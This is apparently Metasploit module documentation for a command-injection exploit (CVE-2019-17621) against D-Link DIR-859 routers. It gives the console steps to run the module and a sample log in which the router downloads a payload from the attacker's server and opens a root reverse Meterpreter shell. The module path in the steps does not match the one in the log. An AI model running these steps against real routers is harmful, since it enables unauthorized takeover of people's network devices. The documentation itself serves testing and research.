## Introduction

This module exploits CVE.2019-17621, a remote unauthenticated OS command injection in the UPnP API of the DIR-859 and other D-link SOHO routers via the `service` argument to the `gena.cgi` URL.

## Vulnerable Application

Get a D-Link DIR-859 router (or [any of the devices/firmware versions mentioned here](https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10147)), or download firmware versions 1.06 or 1.05 and run them on firmadyne or similar emulation frameworks.

## Verification Steps

1. Set up router/emulated device
2. Start `msfconsole`
3. Do: `use exploit/linux/upnp/dlink_dir859_subscribe_exec`
4. Do: `set RHOSTS <router_ip>`
5. Do: `set LHOST <local_ip>`
6. Do: `run`
7. You should get a session as `root`.

## Scenarios

### D-link DIR-859 Firmware 1.05
```
msf5 exploit(linux/http/dlink_dir859_exec_telnet) > run 

[*] Started reverse TCP handler on 192.168.0.2:4444 
[*] Using URL: http://192.168.0.2:8080/r2hOQycyVvN2BP
[*] Client 192.168.0.1 (Wget) requested /r2hOQycyVvN2BP
[*] Sending payload to 192.168.0.1 (Wget)
[*] Command Stager progress - 100.00% done (118/118 bytes)
[*] Meterpreter session 7 opened (192.168.0.2:4444 -> 192.168.0.1:54599) at 2020-01-10 11:36:52 -0300
[*] Server stopped.

meterpreter > getuid 
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo 
Computer     : 192.168.0.1
OS           :  (Linux 2.6.32.70)
Architecture : mips
BuildTuple   : mips-linux-muslsf
Meterpreter  : mipsbe/linux
meterpreter >
```